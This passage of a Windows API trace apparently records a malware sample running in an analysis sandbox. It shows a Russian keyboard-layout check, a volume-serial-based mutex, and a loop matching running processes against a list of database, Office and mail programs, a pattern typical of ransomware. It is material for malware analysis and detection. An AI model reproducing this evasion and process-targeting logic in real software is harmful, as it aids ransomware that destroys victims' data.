[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x4c6360 [0060.267] LocalFree (hMem=0x4c6350) returned 0x0 [0060.267] CloseHandle (hObject=0x138) returned 1 [0060.267] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0060.267] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0060.267] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0060.267] VerifyVersionInfoW (in: lpVersionInformation=0x19f914, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0x19f914) returned 1 [0060.267] GetCurrentProcess () returned 0xffffffff [0060.267] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fa28 | out: TokenHandle=0x19fa28*=0x138) returned 1 [0060.267] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fa2c | out: TokenInformation=0x0, ReturnLength=0x19fa2c) returned 0 [0060.267] GetLastError () returned 0x7a [0060.267] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x4c6250 [0060.267] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x4c6250, TokenInformationLength=0x14, ReturnLength=0x19fa2c | out: TokenInformation=0x4c6250, ReturnLength=0x19fa2c) returned 1 [0060.267] GetSidSubAuthorityCount (pSid=0x4c6258*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x4c6259 [0060.267] GetSidSubAuthority (pSid=0x4c6258*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x4c6260 [0060.267] LocalFree (hMem=0x4c6250) returned 0x0 [0060.267] CloseHandle (hObject=0x138) returned 1 [0060.267] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e10000 [0060.267] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="1") returned 1 [0060.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.267] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.268] RegQueryValueExW (in: hKey=0x138, lpValueName="1", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x12) returned 0x0 [0060.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.268] RegCloseKey (hKey=0x138) returned 0x0 [0060.268] lstrcmpiW (lpString1="00000409", lpString2="00000419") returned -1 [0060.268] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="2") returned 1 [0060.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.268] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.268] RegQueryValueExW (in: hKey=0x138, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.268] RegCloseKey (hKey=0x138) returned 0x0 [0060.269] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="3") returned 1 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.269] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.269] RegQueryValueExW (in: hKey=0x138, lpValueName="3", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.269] RegCloseKey (hKey=0x138) returned 0x0 [0060.269] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="4") returned 1 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.269] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.269] RegQueryValueExW (in: hKey=0x138, lpValueName="4", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegCloseKey (hKey=0x138) returned 0x0 [0060.270] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="5") returned 1 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegQueryValueExW (in: hKey=0x138, lpValueName="5", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegCloseKey (hKey=0x138) returned 0x0 [0060.270] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="6") returned 1 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.270] RegQueryValueExW (in: hKey=0x138, lpValueName="6", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegCloseKey (hKey=0x138) returned 0x0 [0060.271] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="7") returned 1 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegQueryValueExW (in: hKey=0x138, lpValueName="7", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegCloseKey (hKey=0x138) returned 0x0 [0060.271] wsprintfW (in: param_1=0x1e10000, param_2="%d" | out: param_1="8") returned 1 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f968 | out: phkResult=0x19f968*=0x138) returned 0x0 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.271] RegQueryValueExW (in: hKey=0x138, lpValueName="8", lpReserved=0x0, lpType=0x0, lpData=0x1e1000e, lpcbData=0x19f988*=0x80 | out: lpType=0x0, lpData=0x1e1000e*=0x30, lpcbData=0x19f988*=0x80) returned 0x2 [0060.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.272] RegCloseKey (hKey=0x138) returned 0x0 [0060.272] VirtualFree (lpAddress=0x1e1000e, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.272] GetUserDefaultUILanguage () returned 0x409 [0060.272] GetSystemDefaultUILanguage () returned 0x409 [0060.272] VirtualAlloc (lpAddress=0x0, dwSize=0x404, flAllocationType=0x3000, flProtect=0x4) returned 0x1e10000 [0060.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0066.178] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e10200, csidl=35, fCreate=1 | out: pszPath="C:\\ProgramData") returned 1 [0066.182] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e30000 [0066.182] GetWindowsDirectoryW (in: lpBuffer=0x1e30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0066.183] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1e30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x1e30600, lpMaximumComponentLength=0x1e30608, lpFileSystemFlags=0x1e30604, lpFileSystemNameBuffer=0x1e30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1e30600*=0xd2ca4def, lpMaximumComponentLength=0x1e30608*=0xff, lpFileSystemFlags=0x1e30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0066.183] wsprintfW (in: param_1=0x19f5f4, param_2="%X" | out: param_1="34B2937B") returned 8 [0066.183] lstrlenW (lpString="34B2937B") returned 8 [0066.183] lstrlenW (lpString="34B2937B") returned 8 [0066.183] wsprintfW (in: param_1=0x19edf4, param_2="%X" | out: param_1="8A") returned 2 [0066.183] lstrlenW (lpString="8A") returned 2 [0066.183] lstrlenW (lpString="34B2937B") returned 8 [0066.183] wsprintfW (in: param_1=0x19edf8, param_2="%X" | out: param_1="5B") returned 2 [0066.183] lstrlenW (lpString="5B") returned 2 [0066.183] lstrlenW (lpString="34B2937B") returned 8 [0066.183] wsprintfW (in: param_1=0x19edfc, param_2="%X" | out: param_1="A8") returned 2 [0066.183] lstrlenW (lpString="A8") returned 2 [0066.183] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee00, param_2="%X" | out: param_1="B") returned 1 [0066.184] lstrlenW (lpString="B") returned 1 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee02, param_2="%X" | out: param_1="EE") returned 2 [0066.184] lstrlenW (lpString="EE") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee06, param_2="%X" | out: param_1="36") returned 2 [0066.184] lstrlenW (lpString="36") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee0a, param_2="%X" | out: param_1="92") returned 2 [0066.184] lstrlenW (lpString="92") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee0e, param_2="%X" | out: param_1="50") returned 2 [0066.184] lstrlenW (lpString="50") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee12, param_2="%X" | out: param_1="4") returned 1 [0066.184] lstrlenW (lpString="4") returned 1 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee14, param_2="%X" | out: param_1="5") returned 1 [0066.184] lstrlenW (lpString="5") returned 1 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee16, param_2="%X" | out: param_1="F5") returned 2 [0066.184] lstrlenW (lpString="F5") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee1a, param_2="%X" | out: param_1="C4") returned 2 [0066.184] lstrlenW (lpString="C4") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee1e, param_2="%X" | out: param_1="1B") returned 2 [0066.184] lstrlenW (lpString="1B") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee22, param_2="%X" | out: param_1="DD") returned 2 [0066.184] lstrlenW (lpString="DD") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee26, param_2="%X" | out: param_1="F0") returned 2 [0066.184] lstrlenW (lpString="F0") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x19ee2a, param_2="%X" | out: param_1="7A") returned 2 [0066.184] lstrlenW (lpString="7A") returned 2 [0066.184] lstrlenW (lpString="34B2937B") returned 8 [0066.184] wsprintfW (in: param_1=0x1e10000, param_2="Global\\%s.luck" | out: param_1="Global\\8A5BA8BEE36925045F5C.luck") returned 32 [0066.184] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\8A5BA8BEE36925045F5C.luck") returned 0x1b8 [0066.185] GetLastError () returned 0x0 [0066.185] GetLastError () returned 0x0 [0066.185] VirtualFree (lpAddress=0x1e30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.185] VirtualFree (lpAddress=0x1e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c0 [0066.189] VirtualAlloc (lpAddress=0x0, dwSize=0x22c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e10000 [0066.189] Process32FirstW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.190] lstrcmpiW (lpString1="msftesql.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="sqlagent.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="oracle.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="ocssd.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="synctime.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="agntsvc.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="sqlservr.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="encsvc.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="ocomm.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mysqld.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="dbeng50.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="excel.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="infopath.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="msaccess.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="mspub.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="onenote.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="outlook.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="powerpnt.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="steam.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="thebat.exe", lpString2="[System Process]") returned 1 [0066.190] lstrcmpiW (lpString1="thebat64.exe", lpString2="[System Process]") returned 1 [0066.191] lstrcmpiW (lpString1="thunderbird.exe", lpString2="[System Process]") returned 1 [0066.191] lstrcmpiW (lpString1="visio.exe", lpString2="[System Process]") returned 1 [0066.191] lstrcmpiW (lpString1="winword.exe", lpString2="[System Process]") returned 1 [0066.191] lstrcmpiW (lpString1="wordpad.exe", lpString2="[System Process]") returned 1 [0066.191] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x66, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0066.191] lstrcmpiW (lpString1="msftesql.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="sqlagent.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="oracle.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="ocssd.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="synctime.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="agntsvc.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="System") returned 1 [0066.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0066.191] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="encsvc.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="ocomm.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="dbeng50.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="excel.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="infopath.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="msaccess.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="mspub.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="onenote.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="powerpnt.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="steam.exe", lpString2="System") returned -1 [0066.192] lstrcmpiW (lpString1="thebat.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="thebat64.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="thunderbird.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="visio.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="winword.exe", lpString2="System") returned 1 [0066.192] lstrcmpiW (lpString1="wordpad.exe", lpString2="System") returned 1 [0066.192] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0066.193] lstrcmpiW (lpString1="msftesql.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="sqlagent.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="oracle.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="ocssd.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="synctime.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="agntsvc.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="encsvc.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="ocomm.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="dbeng50.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="excel.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="infopath.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="msaccess.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="mspub.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="onenote.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="powerpnt.exe", lpString2="smss.exe") returned -1 [0066.193] lstrcmpiW (lpString1="steam.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="thebat.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="thebat64.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="thunderbird.exe", lpString2="smss.exe") returned 1 [0066.193] lstrcmpiW (lpString1="visio.exe", lpString2="smss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="winword.exe", lpString2="smss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="wordpad.exe", lpString2="smss.exe") returned 1 [0066.194] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.194] lstrcmpiW (lpString1="msftesql.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="sqlagent.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="oracle.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="ocssd.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="synctime.exe", lpString2="csrss.exe") returned 1 [0066.194] lstrcmpiW (lpString1="agntsvc.exe", lpString2="csrss.exe") returned -1 [0066.195] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="encsvc.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="ocomm.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="dbeng50.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="excel.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="infopath.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="msaccess.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="mspub.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="onenote.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="powerpnt.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="steam.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="thebat.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="thebat64.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="thunderbird.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="visio.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="winword.exe", lpString2="csrss.exe") returned 1 [0066.195] lstrcmpiW (lpString1="wordpad.exe", lpString2="csrss.exe") returned 1 [0066.195] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, 